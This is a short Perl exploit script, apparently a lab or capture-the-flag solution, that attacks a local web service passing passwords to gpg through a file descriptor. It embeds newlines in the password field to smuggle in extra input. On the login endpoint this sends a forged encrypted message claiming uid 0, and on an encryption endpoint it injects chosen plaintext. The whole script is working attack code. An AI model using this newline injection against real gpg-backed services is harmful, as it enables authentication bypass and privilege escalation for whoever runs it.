#!/usr/bin/env perl

use strict;
use Mojo::UserAgent;
use IPC::Open2;

sub post {
    my ($endpoint, %parameters) = @_;
    my $ua = new Mojo::UserAgent;
    my $res =  $ua->post("http://localhost:5000/$endpoint" => form => {%parameters})->result;
    return $res->body;
}


my $gpg_cmd = q(/usr/bin/env gpg --pinentry-mode loopback --status-fd 2 --no-tty --no-verbose --fixed-list-mode --batch --with-colons --homedir /tmp/gpg --passphrase-fd 0);
my $msg = qx(echo "boom\n{\\"uid\\":0}" | $gpg_cmd --symmetric --armor);
# decrypt vulnerability
my $decrypted = post('login', username => "harmless_user", password=>"boom\n$msg");
warn "/login output: $decrypted\n";

# encrypt vulnerability
my $encrypted = post('encryption_as_a_service', password => "s3cret\nOh yes I can change it");

my($chld_out, $chld_in);
my $pid = open2(my $gpg_out, my $gpg_in, qq($gpg_cmd -d));
print $gpg_in "s3cret\n$encrypted";
close($gpg_in);
my $plaintext = <$gpg_out>;
close($gpg_out);
waitpid( $pid, 0 );

warn "/encryption_as_a_service output: $plaintext\n";